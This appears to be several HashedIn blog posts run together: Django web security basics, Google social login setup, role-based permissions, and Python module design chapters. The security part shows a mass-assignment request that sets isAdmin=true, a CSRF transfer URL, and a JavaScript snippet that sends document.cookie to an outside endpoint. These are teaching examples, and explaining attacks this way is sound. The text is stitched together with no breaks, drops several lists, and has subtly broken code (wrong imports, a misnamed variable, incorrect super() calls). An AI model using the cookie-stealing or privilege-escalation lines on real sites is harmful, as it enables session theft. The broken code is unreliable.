Introduction

Security is vital but variable according to the functionality of the web application. Some companies might have a greater concern for multi-factor authentication than others. However, one cannot completely rule out attempted break-ins. Therefore, a good web security is always a must.

This blog post attempts to throw some light on the possible threats and will act as an entry point for the reader for further personal research.

Mass Assignment

Mass assignment is known to be a vulnerability when a web application’s ORM(object-relational mapping) interface is exploited to change the certain type of information in the database, which in any case shouldn’t be allowed to be changed by the user. These types of information include the session keys, cookie data, passwords, permissions, and admin access.

 

Almost all of the latest web application frameworks such as Django, java spring, or even when SQLAlchemy used for frameworks such as Flask, implement an ORM interface over which the application can interact more easily with the database. This is where the data which are in serialization formats, are automatically converted into internal objects, by generating the SQL statements to reflect onto your database. It has never been this easy!

Moving on to the downtimes, if the selected framework’s interface is like a three-legged chair, or if it is a mistake on behalf of the developer that he or she failed to mark specific fields to be immutable, it is possible that the bad guy will try to overwrite fields that you actually never intended to be changed from the outside. Big trouble, mate.

Here is a typical request:

POST /addUser
userid=hashedtables&password=hashedpass&email=hasher@hashedin.com
And, here is the exploit(isAdmin=true):
POST /addUser  userid=hashtables&password=hashedpass&email=hash@hashedin.com&isAdmin=true

This functionality becomes exploitable when:

The easiest way to block this kind of breach in Django is to use Forms. There will be custom cases and requirements, but forms are almost always the right thing to do. The trick is just to use them in the right way.

from Django import forms
from myapp.models import Whatzit

class UserForm(forms.ModelForm):
    class Meta(object):
        model = User
        fields = ('username', 'password', 'email')

This whitelists the fields the user can change. Similarly, there is also an excludes property that lets us blacklist fields.

We have our ModelForm instance. If we want to add in our custom requirements, we can use custom validation logic. Django offers features where we can display an error to the user saying “your password needs to be of so and so length”, or any type of password policy that you want to incorporate. It also includes constraints on Age, username, email address and on different fields too.
How to run all the validation for us in our code?
Call the built-in is_valid() in your template, and it will do just that, furthermore, allowing the users to change only what they are authorized to change.

Clickjacking

Hijacking is to vehicles, as Clickjacking is to clicks. They are also known as “UI redress attacks”, where the attacker renders a concealed layer on your website, in the hope of deceiving the client into clicking on to it, may it be a button, or link, which redirects it to another page, owned by another application, domain, or both.

Suppose this new endpoint’s functionality is to install a script introducing a worm on your machine, which suppose in this case, is connected to your production server network. This worm will be the cause of replication of itself on every other host with which it can communicate with, resulting in big trouble.

Similarly, keyboard strokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be deceived into typing their password to their social account, or banking websites when they are actually typing into the attacker’s form input, thus giving them access to the secret data from the user.

This can either be done by using an XSS vector, which interchanges the endpoints and the links, or even entire segments of your page or can be even done by putting your page in an iframe and rendering the attacker’s content over yours.

The common solutions that can be discussed for the same consists of:

Framekillers

Framekillers are the solution to the problem of ClickJacking. They are written in JavaScript with the intended functionality of checking if the current window is the main window.

The suggested approach would be to hinder rendering of the window and unblock only after being sure that the current window is the primary one:

<style> html{display:none;} </style>
<script>
   if(self == top) {
       document.documentElement.style.display = 'block'; 
   } else {
       top.location = self.location; 
   }
</script>

Latest internet browsers have the inbuilt system of the HTTP header, X-Frame-Options, which can be thought of as a setting that allows you to permit resources loading within a frame or iframe.
The header takes two values:

Django’s implementation of clickjacking protection:

  1. A simple middleware that sets the header in all responses.
  2. A set of view decorators that can be used to override the middleware or to only set the header for certain views.

The X-Frame-Options HTTP header will only be set by the middleware or view decorators if it is not already present in the response.

Avoid Clickjacking.

Setting X-Frame-Options for all responses

To set the same X-Frame-Options value for all responses in your site, put ‘django.middleware.clickjacking.XFrameOptionsMiddleware’ to MIDDLEWARE:

 

MIDDLEWARE = [
    ...
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    ...
]

The middleware displayed above will set the X-Frame-Options header value to SAMEORIGIN for every HttpResponse. If your requirements are such that you want to use DENY in place of that, you can always set this setting to the value you want.

X_FRAME_OPTIONS = 'DENY'

There may be requirements where you want some views where you do not want the X-Frame-Options header value set. For such cases, Django offers view decorators that instructs the middleware not to set the header.

 

from django.http import HttpResponse
from django.views.decorators.clickjacking import xframe_options_exempt

@xframe_options_exempt
def let_load_in_an_iframe(request):
    return HttpResponse("This page is safe to load in an iframe on any site.")

 

@xframe_options_deny and @xframe_options_sameorigin are other decorators that Django provides apart from @xframe_options_exempt, to set the X-Frame-Options header on a selective view basis.

Read more about it at:

ClickJacking in Django

Session fixation and hijacking

It is always advised for a website’s security to force redirect all HTTP communication attempts via HTTPS. This would prevent malicious network users to use software such as Wireshark, smartsniff, which were intended towards the use of testing inter-connectivity among networks, can be used for sniffing authentication credentials or any other data that are being passed between the client and the server. This can also be done through ARP poisoning.

More on ARP poisoning:

ARP poisoning

In some very realizable cases, the data can be changed between the transit from client to server or vice versa. The people responsible for this are called active network trespassers.

 

Embrace the protection HTTPS provides. Enable it on your server. There may be additional steps in Django that you may want to look through:

 

var r = new Image();
r.src = 'https://hashedin.com/record?' + document.cookie;
body.appendChild(i);

This could very well result in grabbing every cookie on the site, but especially the session ID, and impersonating a poor, well-intentioned user.

In the end, be positive to delete the session data for a particular user after his/her log out. You could, in turn, mark it invalid, upon the further use or generate something like a temporary random generated security token upon each login to initiate the session in an intended manner.

CSRF: Cross-Site Request Forgeries

An example of a GET request:

http://badevilcorpbank.com/transfer?from=act1&to=act2&amt=100000.00

Leaving aside how we haven’t used HTTPS in spite of the above content, and following that, there is no confirmed validation that the request is coming from a legit requester. I could append an image tag with the URL thus resulting in receiving a hundred rupees every time, someone hit the endpoint.

Most web frameworks, like Django, have built-in CSRF protection that uses the concept of a nonce, or one-time-use number. These are submitted with a form (over the POST, hopefully, if not, sigh!) to the server. If the number generated on the server is the same as that was sent through the form, the request is allowed to pass through. If the number doesn’t match, the request is disallowed.

When installed with HTTPS, CsrfViewMiddleware in Django will check the authentication of the HTTP referer header. It will further check that the header is set to a URL which is of the same origin including domain, subdomain, and port.

Since HTTPS offers extra security it is of utmost importance to do the following:

A neat tool named Django-session-CSRF also comes in handy in such situations. Django-session-CSRF is an alternative implementation of Django’s CSRF protection that does not use cookies. Instead, it maintains the CSRF token on the server using Django’s session backend. The CSRF token must still be included in all POST requests (either with csrfmiddlewaretoken in the form or with the X-CSRFTOKEN header).

Find out more in Django-session-csrf.

A Django 3rd party package named Django-session-csrf is of vital importance in such situations. It provides a custom setting interface of Django’s CSRF protection. It does not run on cookies as legacy dDjango’sCSRF protection does. In place, it just maintains the CSRF token on the physical server using Django’s SESSSION BACKEND.

Either way, the csrf token must be included in all future POST requests.

This can be done in two ways:

Password Storage

The most important credential to authenticate and recognize a user is the password, which is why we need robust ways to store it in an encrypted way.

So what is The Right Thing to do?

This can be achieved by tools like Django-sha2, which adds strength, but backward-compatible, password hashing support to Django.

The image being self-explanatory highlights the need for security best practices to be implemented during the development of web applications. There are certain immediate steps you can take to quickly and effectively improve the security of your application. However, as applications grow, they become more cumbersome to keep track of in terms of security. Putting the proper web application security best practices in place, as outlined in the list above, will help ensure that your applications remain safe for everyone to use.

In this article post, we will learn how to implement social login in a Django application by using  Social auth app Django which happens to be one of the best alternatives of the deprecated library python social auth

What is Social-Auth-App-Django?

Social auth app Django is an open source python module that is available on PyPI. This is maintained under the Python Social Auth organization. Initially, they started off with a universal python module called Python social auth which could be used in any Python-based web framework. However, at the moment they have deprecated this library.
Going further, the code base was split into several modules in order to offer better support for python web frameworks. The core logic of social authentication resides in the social core module, which is then used in other modules like – social auth app djangosocial app flask, etc.

Installation Process

Let us now create an app called authentication. This app will contain all the views/urls related to Django social authentication.
python manage.py startapp authentication
You will have to make sure that you have created a Django project and then install social-auth-app-django from PyPI.
pip install social-auth-app-django
Then, add ‘social_django’ to your installed apps.

INSTALLED_APPS = [
    ...
    'social_django',
    'authentication',
]

Now, migrate the database:

python manage.py migrate

Now, go to http://localhost:8000/admin and you should see three models under SOCIAL_DJANGO app

Django admin with social auth

Configure Authentication Backend

Now, to use social-auth-app-django’s social login, we will have to define our authentication backends in the setting.py file. Note that although we want to give our users a way to sign in through Google, we also aim to retain the normal login functionality where the username and password can be used to login to our application. In order to do that, configure the AUTHENTICATION_BACKENDS this way:

AUTHENTICATION_BACKENDS = (
    'social_core.backends.google.GoogleOAuth2',
    'django.contrib.auth.backends.ModelBackend',
)

Note that we have django.constrib.auth.backends.ModelBackend still in our AUTHENTICATION_BACKENDS. This will let us retain the usual login flow.

Template and Template Context Processors

To keep it simple, we will have a plain HTML file which has a link to redirect the user for google+ login.
Go ahead and add a templates’ folder to the authentication app and create a new index.html file in it. In this html file, we will just be putting a simple anchor tag, which will redirect to social-auth-app-django’s login URL


  
  Google+

In authentication/views.py render this template


We will now have to add context processors, which provide social auth related data to template context:

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': ['templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                'social_django.context_processors.backends', # this
                'social_django.context_processors.login_redirect', # and this
            ],
        },
    },
]

 

URL Configurations

So, now we have our template setup and we just need to add our index view and the Django social auth URLs in our project.
Go to the urls.py and add this code:

urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url('^api/v1/', include('social_django.urls', namespace='social')),
    url('', views.index),
]

 

Obtaining Google OAuth2 Credentials

To obtain the Google OAuth2 credentials, Follow these steps:

  1. Go to Google developer console
  2. You now have to create a new project. In case you do not have any (see the drop-down at the top left of your screen)
  3. Once the project is created you will be redirected to a dashboard. You will have to click on ENABLE API button
  4. Select Google+ APIs from the Social APIs section
  5. On the next page, click the Enable button to enable Google+ API for your project
  6. To generate credentials, select the Credentials tab from the left navigation menu and hit the ‘create credentials’ button
  7. From the drop-down, select OAuth client ID.
  8. On the next screen, select the application type (web application in this case) and enter your authorized javascript origins and redirect uri

For now, just set the origin as http://localhost:8000 and the redirect URI as http://localhost:8000/complete/google-oauth2/
Hit the create button and copy the client ID and client secret

Configuration of OAuth Credentials

Now, got to setting.py and add you OAuth creadentials like this:

SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = 
SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = 

Finally, define the LOGIN_REDIRECT_URL

LOGIN_REDIRECT_URL = '//'

For setting up credentials for other OAuth2 backend, the pattern is like this:

SOCIAL_AUTH__KEY = 
SOCIAL_AUTH__SECRET = 

Usage

Now that the configuration is done, we can start off using the social login in the Django application. Go to http://localhost:8000 and click the Google+ anchor tag.
It should redirect to Google OAuth screen where it asks you to sign in. Once you sign in through your Gmail account, you should be redirected to the redirect URL.
To check if a user has been created, go to the django admin (http://localhost:8000/admin) and click on the User social auths table. You should see a new user there with the provider as goole-oauth2 and Uid as your gmail id.

Django admin social auth user data

 

Triggering The OAuth URLs from Non-Django Templates

There are chances that you want to trigger the social login URLs from a template that is not going to pass through Django’s template context processors. For instance, when you want to implement the login in an HTML template which is developed in using ReactJS.
This is not as complicated as it looks. Just mention the href in your anchor tag like this:


  Google+

The login URL for other OAuth providers is of the same pattern. If you are not sure about what the login redirect url should be, there are two ways to find the URL – either jump into their code base or try this hack –

  1. You can create a Django template and place an anchor tag with the respective URL as shown in the Templates and Template context processors section.
  2. You can remove the respective provider (in case of Google oauth2, remove social_core.backends.google.GoogleOAuth2) from the AUTHENTICATION_BACKENDS in settings.py
  3. You can click the anchor tag in a Django template. Doing so, you would see the Django’s regular error template saying “Backend not found”.
  4. Copy the current URL in the browser and use it in your non-Django template.

Summary

We learned what Social auth app Django is and that it uses social core behind the scenes. We also learned how to implement social login in Django through templates that are processed by Django and through non-Django templates, which could be developed using JS frameworks like ReactJS.

Role Based Access Control provides restrictive access to the users in a system based on their role in the organization. This feature makes the application access refined and secure.

Django provides authentication and authorization features out of the box. You can use these features to build a Role Based Access Control. Django user authentication has built-in models like User, Group, and Permission. This enables a granular access control required by the application.

Here Are Some Build-In Models

User Objects: Core of Authentication

This model stores the actual users in the system. It has basic fields like username, password, and email. You can extend this class to add more attributes that your application needs. Django user authentication handles the authentication through session and middlewares.

With every request, Django hooks a request object. Using this, you can get the details of the logged in user through request.user. To achieve role-based access control, use the request.user to authorize user requests to access the information.

Groups: Way of Categorizing Users

These are logical groups of users as required by the system. You can assign permissions and users to these groups. Django provides a basic view in the admin to create these groups and manage the permissions.
The group denotes the “role” of the user in the system. As an “admin”, you may belong to a group called “admin”. As a “support staff”, you would belong to a group called “support”.

Permission: Granular Access Control

The defined groups control access based on the permissions assigned to each group. Django allows you to add, edit, and change permissions for each model by default.
You can use these permissions in the admin view or in your application. For example, if you have a model like ‘Blog’.

Class Blog(models.Model):
 pub_date = models.DateField()
 headline = models.CharField(max_length=200)
 content = models.TextField()
 author = models.ForeignKey(User)

Each of these models is registered as ContentType in Django. All of the permissions that Django creates underclass Permission will have a reference to this specific ContentType. In this case, the following permissions will be created by default:

add_blog: Any User or group that has this permission can add a new blog. change_blog: Any user or group that has this permission can edit the blog. delete_blog: Any user or group that has this permission can delete a blog.

Adding Custom Permissions

Django default permissions are pretty basic. It may not always meet the requirements of your application. Django allows you to add custom permissions and use them as you need. With a model meta attribute, you can add new permissions:

Class Blog(models.Model):
  …
  Class Meta:
     permissions = (
           ("view_blog", "Can view the blog"),
           ("can_publish_blog", "Can publish a blog"),
     )

These extra permissions are created along with default permissions when you run manage.py, migrate.

How To Use These Permissions

You can assign permission to a user or a group. For instance, you can give all the permissions to the group “admin”. You can ensure that the “support” group gets only the “change_blog” permission. This way only an admin user can add or delete a blog. You need Role-Based Access control for this kind of permission in your views, templates or APIs.

Views:

To check permissions in a view, use has a _perm method or a decorator. The User object provides the method has_perm(perm, obj=None), where perm is “.” and returns True if the user has the permission.

user.has_perm(‘blog.can_publish_blog”)

You can also use a decorator ‘permission_required(perm, login_url=None, raise_exception=False)’. This decorator also takes permission in the form “.”. Additionally, it also takes a login_url which can be used to pass the URL to your login/error page. If the user does not have the required permission, then he will be redirected to this URL.

from Django.contrib.auth.decorators import permission_required

@permission_required(‘blog.can_publish_blog’, login_url=’/signin/’) def publish_blog(request): …
If you have a class-based view then you can use “PermissionRequiredMixin”. You can pass one or many permissions to the permission_required parameter.

from Django.contrib.auth.mixins import PermissionRequiredMixin

class PublishBlog(PermissionRequiredMixin, View): permission_required =blog.can_publish_blog’
[/et_pb_text][et_pb_text admin_label=”Templates:” _builder_version=”3.0.86″ background_layout=”light”]

Templates:

The permissions of the logged in user are stored in the template variable. So you can check for a particular permission within an app.

Level of Access Control: Middleware Vs Decorator

A common question that plagues developers:“Where do I put my permission check, decorator or middleware?”. To answer this question, you just need to know if your access control rule is global or specific to a few views.
For instance, imagine you have two access control rules. The first states that all the users accessing the application must have “view_blog” permission. As per the second rule, only a user having a permission “can_publish_blog” can publish a blog.

 

In the second case, you can add the check as a decorator to the”publish_blog” view.
In case of former, you will put that check in your middleware as it applies to all your URLs. A user who does not have this permission cannot enter your application. Even if you add it as a decorator, the views are safe.

 

But adding the decorator to every view of your application would be cumbersome. If a new developer forgets to add the decorator to a view he wrote, the rule gets violated.

Therefore, you should check any permission that’s valid globally in the middleware.

Summary

Thus, you can use Django user authentication to achieve complete role-based access control for your application. Go ahead and make the most of these features to make your software more secure.

Designing Modules in Python is part of HashedIn’s training program for junior developers to get better at design. Today, we are making it available as a free ebook.
 Download E-Book

Who is this ebook for?

This book is for all those who have some experience in an object-oriented programming language. If you wish to get better at the module or class level design, then this book is definitely for you. You will be able to identify a good design from the bad after you finish reading this book
All throughout this book, python is used to introduce various design patterns. However, the knowledge of python is not mandatory. If you can understand classes and methods, you will easily be able to understand the contents of this book

How to use this book

To make the most of this book, read the requirements at the start of each chapter and write down your solution. Then read through the rest of the chapter and critique your solution.
Good design is obvious once presented. However, arriving at that solution is difficult, especially if you are new to programming. Writing down your solution is the only way to realize the shortcomings of your design. If you read the chapter without writing, you will tell yourself “That was obvious. I would have solved it in a similar manner”

History of this book

At HashedIn, we conduct a training program for junior developers to get better at design. During one of these programs, we asked developers to design a module to send SMS/text messages. We also asked them to call the SMS module from 3 different client applications. They had 30 minutes to complete this activity.
After 30 minutes, we revealed a new set of requirements. Additionally, we set 2 hard rules for them to implement these requirements:

  1. Developers were not allowed to change the way client applications invoked their SMS module
  2. Developers were not allowed to modify existing code. Instead, they had to write new code to address the additional requirements, without duplicating code.

20 minutes later, we again introduced a new set of requirements. And after another 20 minutes, we introduced the final set of requirements.
Initially, the developers felt the problem was very simple. They were at loss to understand why the design was even needed. Isn’t this a simple python function?
But as new requirements emerged, and because we gave them constraints (don’t change existing code) – they began to appreciate the various design principles. Some even developed a mental model to discern good design from bad.
Over time, we got the opportunity to review designs from several developers. We learned how junior developers think when asked to solve a problem. Based on these patterns, we wrote a series of blogs on how to design modules in python.

Design Modules in Python

Python Interface Design

The first module will teach you as to how you can design a reusable python module. By the end of the post, you will get a great understanding of writing reusable and extensible modules in python.

You have been given the following requirements:

You are the developer on Blipkart, an e-commerce website. You have been asked to build a reusable SMS module that other developers will use to send SMS’es. Watertel is a telecom company that provides a REST API for sending SMS’es, and your module needs to integrate with Watertel. Your module will be used by other modules such as logistics.py and orders.py.


The first goal for a module should be good Abstraction. Your module sits between client developers on one side, and the API provided by Watertel on the other side. The module’s job is to simplify sending an SMS, and to ensure that changes in Watertel do not affect your client developers.

The essence of abstractions is preserving information that is relevant in a given context, and forgetting information that is irrelevant in that context.

Watertel exposes these concepts – username, password, access_token and expiry, phone number, message, and priority. Which of these concepts are relevant to client developers?

Client developers don’t care about username and password. They don’t want to worry about expiry either. These are things our module should handle. They only care about phone number and message – “take this message, and send it to this phone number”.

 

Interface Design

Since developers only care about phone_number and message, our interface design is very clear – we need a send_sms(phone_number, message) function. Everything else is irrelevant.

Now, looking from an implementation perspective. We need the URL, the username, and password. We also need to manage the access token and handle its expiry. How will we get this information? Let’s carve out an interface design for our solution.

In general, if you need some information, or if you depend on other classes – you must get it via your constructor. Your class must not go about trying to find that information on its own (say from Django settings).

Here’s how our interface looks like:

# sms.py:
class SmsClient:
    def __init__(self, url, username, password):
        self.username = username
        self.password = password
    def send_sms(phone_number, message):
        # TODO - write code to send sms
        pass

 

Using our Class in Client Code

Next, in order to use our module, our clients need an object of SmsClient. But in order to create an object, they’d need username and password. Our first attempt would be something like this:

# In orders.py
from django.conf import settings
from sms import SmsClient
sms_client = SmsClient(settings.sms_url, settings.sms_username, settings.sms_password)
....
sms_client.send_sms(phone_number, message)

There are two problems with this:

  1. First, orders.py shouldn’t care how SmsClient objects are constructed. If we later need additional parameters in the constructor, we would have to change orders.py, and all classes that use SmsClient. Also, if we decide to read our settings from someplace else (say for test cases), then orders.py would have to be modified.
  2. The second problem is that we would have to create SmsClient objects everywhere we want to use it. This is wasteful, and also leads to code duplication.

The solution is to create SmsClient object in sms.py module [see footnote 1]. Then orders.py and logistics.py can directly import the object from SMS. Here is how it looks.

# In sms.py:
from django.conf import settings
class SmsClient:
    def __init__(self, url, username, password):
        self.username = username
        self.password = password
    def send_sms(phone_number, message):
        # TODO - write code to send sms
        pass
sms_client = SmsClient(settings.sms_url, settings.sms_username, settings.sms_password)

and in orders.py:

# orders.py
from sms import sms_client
...
# when you need to send an sms
sms_client.send_sms(phone_number, message)

Before you start implementing, think about how your clients will use your module. It’s a good idea to actually write down the client code (i.e. code in orders.py and logistics.py) before you start implementing your module.

Now that we have our interface defined, we can start implementing our module.

Python Dependency Injection

Next step is to learn as to how python design patterns can be benefited from dependency injection.

Here we discuss how python module designing be benefited from dependency injection. You have been given the following requirements:

You are the developer on Blipkart, an e-commerce website. You have been asked to build a reusable SMS module that other developers will use to send SMS’es. Watertel is a telecom company that provides a REST API for sending SMS’es, and your module needs to integrate with Watertel. Your module will be used by other modules such as logistics.py and orders.py.


The client modules have a dependency on our module to complete a portion of its work which is – sending an SMS. So our module’s object has to be injected in the client’s module through the respective modules do not know each other directly.

Why Dependency Injection?

The essence of dependency injection is that it allows the client to remove all knowledge of a concrete implementation that it needs to use. This helps isolate the client from the impact of design changes and defects. It promotes reusability, testability and maintainability.

Basically, instead of having your objects creating a dependency or asking a factory object to make one for them, you pass the needed dependencies into the object externally, and you make it somebody else’s problem. This “someone” is either an object further up the dependency graph, or a dependency injector (framework) that builds the dependency graph. A dependency as I’m using it here is any other object the current object needs to hold a reference to.

The client modules ie. orders.py and logistics.py can import our module’s object and then inject it where it needs the module to perform its task.

This will explain how it should look like.

# In sms.py:
from django.conf import settings
class SmsClient:
    def __init__(self, url, username, password):
        self.username = username
        self.password = password
    def send_sms(phone_number, message):
        # TODO - write code to send sms
        pass
sms_client = SmsClient(settings.sms_url, settings.sms_username, settings.sms_password)

and in orders.py:

# orders.py
from sms import sms_client
...
# when you need to send an sms
sms_client.send_sms(phone_number, message)

How does Dependency Injection help us?

1. Dependency Injection decreases coupling between a class and its dependency.

2.Because dependency injection doesn’t require any change in code behavioDependencybe applied to legacy code as a refactoring. The result is clients that are more independent and that are easier to unit test in isolation using stubs or mock objects that simulate other objects not under test. This ease of testing is often the first benefit noticed when using dependency injection.

3. To free modules from assumptions about how other systems do what they do and instead rely on contract.

4. To prevent side effects when replacing a module.

So in all, dependency injection is a great practice to make our modules more testable, maintainable and scalable and we should use it more often to make our lives easier as developers.

Exception Handling In Python

Now we will have a detailed discussion on the Exception Handling in Python.

We will discuss in detail, the implementation of a robust SMS module.

To start sending SMS’es, we need to first login to Watertel, store the accessToken and the time when the accessToken expires.

# sms.py
class SmsClient:
    def __init__(self, url, username, password):
        self.url = url
        self.username = username
        self.password = password
        self.access_token = None
        self.expires_at = 0
    def _login(self):
        # TODO - Make HTTPS request, get accessToken and expiresAt
        # TODO - error handling, check status codes
        self.access_token = response["accessToken"]
        self.expires_at = get_current_time() + response["expiry"]

You don’t expect or want client developers to think about login, hence we make the login method private (start with the underscore).
Now we need to decide who calls the _login method. One easy (and wrong) choice, is calling the _login method from our constructor. Constructors must not do real work, but only aid in initialization. If we make network calls in the constructor, it makes the object difficult to test, and difficult to reuse.
So _login cannot be called by clients, and cannot be called in the constructor. Which leaves us with only one choice – call _login from the send_sms method. And while we are at it, we will add another wrapper to directly get us the access_token without worrying about expiry. This also gives the necessary modularity to our code.

def _get_access_token(self):
    if (get_current_time() > self.expires_at):
        self._login()
    return self.access_token
def send_sms(self, phone_number, message):
    access_token = self._get_access_token()
    # TODO: use the access_token to make an API call and send the SMS

At this point we can start writing code to send the SMS. We will assume a make_request function that returns the parsed JSON object and the http status code.

def send_sms(self, phone_number, message):
    access_token = self._get_access_token()
    status_code, response = _make_http_request(access_token, phone_number, message)
    ...

Error Handling in Python – Status Codes

What should we do with the status_code? One option is to return the status_code and let our clients handle it. And that is a bad idea.
We don’t want our clients to know how we are sending the SMS. This is important – if the clients know how you send the SMS, you cannot change how your module works in the future. When we return the HTTP status code, we are telling them indirectly how our module works. This is called a leaky abstraction, and you want to avoid it as much as possible (though you can’t eliminate it completely).
So to give our code the much-needed abstraction, we will not return the status code, but we still want our clients to do some error handling. Since our clients are calling a python method, they expect to receive errors the pythonic way – using Exception Handling in Python.
When it comes to error handling, you need to be clear whose problem it is. It’s either the client developer’s fault or your module’s fault. A problem with your module’s dependency (i.e. Watertel server down) is also your module’s fault – because the client developer doesn’t know Watertel even exists.
We will create an exception class for each possible error in the module –

On implementing python exception handling, here is how our code looks like:

def _validate_phone_number(self, phone_number):
    if not phone_number:
        raise InvalidPhoneNumberError("Empty phone number")
    phone_number = phone_number.strip()
    if (len(phone_number) > 10):
        raise InvalidPhoneNumberError("Phone number too long")
    # TODO add more such checks
def _validate_message(self, message):
    if not message:
        raise InvalidMessageError("Empty message")
    if (len(message) > 140):
        raise InvalidMessageError("Message too long")
def send_sms(self, phone_number, message):
    self._validate_phone_number(phone_number)
    self._validate_message(message)
    access_token = self._get_access_token()
    status_code, response = _make_http_request(access_token, phone_number, message)
    if (status_code == 400):
        # This is Watertel telling us the input is incorrect
        # If it is possible, we should read the error message
        # and try to convert it to a proper error
        # We will just raise the generic BadInputError
        raise BadInputError(response.error_message)
     elif (status_code in (300, 301, 302, 401, 403)):
         # These status codes indicate something is wrong
         # with our module's logic. Retrying won't help,
         # we will keep getting the same status code
         # 3xx is a redirect, indicate a wrong url
         # 401, 403 have got to do with the access_token being wrong
         # We don't want our clients to retry, so we raise RuntimeError
         raise RuntimeError(response.error_message)
      elif (status_code > 500):
         # This is a problem with Watertel
         # This is beyond our control, and perhaps retrying would help
         # We indicate this by raising SmsException
         raise SmsException(response.error_message)

Error Handling in Python – Exceptions

Apart from error handling of status codes, there’s one more thing that is missing – handling any exceptions that are raised by _make_request. Assuming you are using the wonderful requests library, this is the list of exceptions that can be thrown.
You can categorize these exceptions into two categories – safe to retry v/s not safe to retry. If it is safe to retry, wrap the exception in a SMSException and raise it. Otherwise, just let the exception propagate.
In our case, ConnectTimeout is safe to retry. ReadTimeout indicates the request made it to the server, but the server did not respond timely. In such cases, you can’t be sure if the SMS was sent or not. If it is critical the SMS be sent, you should retry. If your end users would be annoyed receiving multiple SMSes, then do not retry.
You can handle these exceptions inside the _make_request method.

def _make_http_request(access_token, phone_number, message):
    try:
        data = {"message": message, "phone": phone_number, "priority": self.priority}
        url = "%s?accessToken=%s" % (self.url, access_token)
        r = requests.post(url, json=data)
        return (r.status_code, r.json())
    except ConnectTimeout:
        raise SmsException("Connection timeout trying to send SMS")

This should have given you a gist of how exception handling in python can help build a cleaner and more robust code.
That covers most of the implementation of our module. We won’t get into the code that actually makes the HTTP request – you can use the requests library for that.

So,

  1. Don’t leak inner workings of your module to your clients, otherwise, you can never refactor or change your implementation.
  2. Raise appropriate Errors to inform your clients about what went wrong.

Open Closed Principle in Python

The open/closed principle teaches us not to modify our already working code just for adding new features.

 

New Requirements – Retry Failed SMS’es

We now have a feature request from the product managers:

Customers are complaining that they don’t receive SMS’es at times. Watertel recommends resending the SMS if the status code is 5xx. Hence we need to extend the sms module to support retries with exponential backoff. The first retry should be immediate, the next retry within 2s, and the third retry within 4s. If it still continues to fail, give up and don’t try further.

Of course, our product manager assumed we would take care of a few things, viz

  1. We will implement this in all of the 50 modules that are sending SMS’es.
  2. There would be no regression bugs due to this change.

 

Don’t modify the code that’s already working

Let’s start planning our change. There are two seemingly opposing views here. We don’t want client developers to change their code, not even a single character. At the same time, the SmsClient class we wrote in part IIworks great – and we don’t want to change the code that is already working either.
A little aside – let’s look at the open/closed principle. The open/closed principle tells us that we should not modify existing source code just to add new functionality. Instead, we should find ways to extend it without modifying the source code. It is a part of the SOLID Programming Principles. In fact, it stands for the ‘O’ in the SOLID principles. In our case, the open/closed principle implies that we don’t want to touch the source code for SmsClient.

Using Inheritance

This is a tricky situation, but as with everything else in software, this problem can be solved with a little bit of indirection. We need something sitting in between our clients and our SmsClient class. That something can be a derived class of SmsClient.

# This is the class we wrote in Part III
# We are not allowed to change this class
class SmsClient:
    def send_sms(self, phone_number, message):
        ...
class SmsClientWithRetry(SmsClient):
    def __init__(self, username, password):
        super(SmsClient, self).__init__(username, password)
    def send_sms(self, phone_number, message):
        # TODO: Insert retry logic here
        super(SmsClient, self).send_sms(phone_number, message)
        # TODO: Insert retry logic here
# Earlier, client was an instance of SmsClient, like this
# client = SmsClient(username, password)
# We now change it to be an instance of SmsClientWithRetry
# As a result, our client developers doesn't have to change
# They are simply importing client from sms.py
client = SmsClientWithRetry(username, password)

If you notice, using inheritance, we got ourselves a way to add retry logic without modifying the existing code that is already known to work. This is the crux of the open/closed principle. See Footnotes for a caveat on using inheritance.

Adding Retry Logic

With that done, we can now work on adding the retry logic. We don’t want to retry if our client gave us an invalid phone number or a bad message – because it is a waste of resources. Even if we retried 100 times, it won’t succeed. We also don’t want to retry if there is a logic problem in our module’s code – because our code cannot fix itself magically, and hence, retry is unlikely to help.
In other words, we only want to retry if Watertel has a problem and we believe retrying may end up delivering the message.

If you revisit our original SmsClient implementation, you will now appreciate the way we designed our exceptions. We only want to retry when we get a SmsException. We simply let the client developers deal with all the other exception types.

How do we go about writing the retry loop? The best way to write the retry logic is via a decorator. It’s been done so many times in the past, that it’s best I point you out to some libraries.

Thus, the open/closed principle tells us not to modify our already working code just to add new features. It’s okay to change the code for bug fixes, but other than that, we should look at functional/object-oriented practices to extend the existing code when we want to add new functionalities.
Thus, we saw how the application of the SOLID programming principle and the open/closed principle in specific helped us to manage retries in our system.

A Tip: In general, we should prefer composition over inheritance.

Inheritance versus Composition in Python

We will now compare the inheritance and composition to determine better ways to reuse the existing code.

We now have new requirements for our product managers:

To increase the reliability of our SMSes, we would like to add Milio to our SMS providers. To start with, we want to use Milio only for 20% of the SMSes, the remaining should still be sent via Watertel.
Milio doesn’t have a username/password. Instead, they provide an access token, and we should add the access token as a HTTP header when we make the post request.

Of course, like last time around

  1. We do not want to change existing code that is already working.
  2. We need to have the retry logic for Milio as well.
  3. Finally, we do not want to duplicate any code.

Creating an Interface

The first obvious step is to create a new class MilioClient, with the same interface as our original SmsClient. We have covered this before, so we will just write the pseudo-code below.

class MilioClient:
    def __init__(self, url, access_token):
        self.url = url
        self.access_token = access_token
    def send_sms(self, phone_number, message):
        # Similar to send_sms method in SmsClient
        # Difference would be in the implementation of _make_request
        # We will have different JSON response,
        # and different request parameters
        print("Milio Client: Sending Message '%s' to Phone %s"
                 % (message, phone_number))

Some discussion points –

  1. Should MilioClient extend SmsClient? No. Though both are making network calls, there isn’t much commonality. The request parameters are different, the response format is different.
  2. Should MilioClient extend SmsClientWithRetry? Maybe. Here, the retry logic is reusable and common between the two. We can reuse that logic using inheritance, but it isn’t the right way to reuse. We will discuss this a little later in this post.

Inheritance versus Composition

The reason why we can’t inherit the SmsClientWithRetry class is that the constructor of this class expects a username and password. We don’t have that for Milio. This conflict is large because we made a mistake in the earlier chapter – we chose to build new logic using inheritance. Better late than never. We will refactor our code and this time, we will use Composition instead of Inheritance.

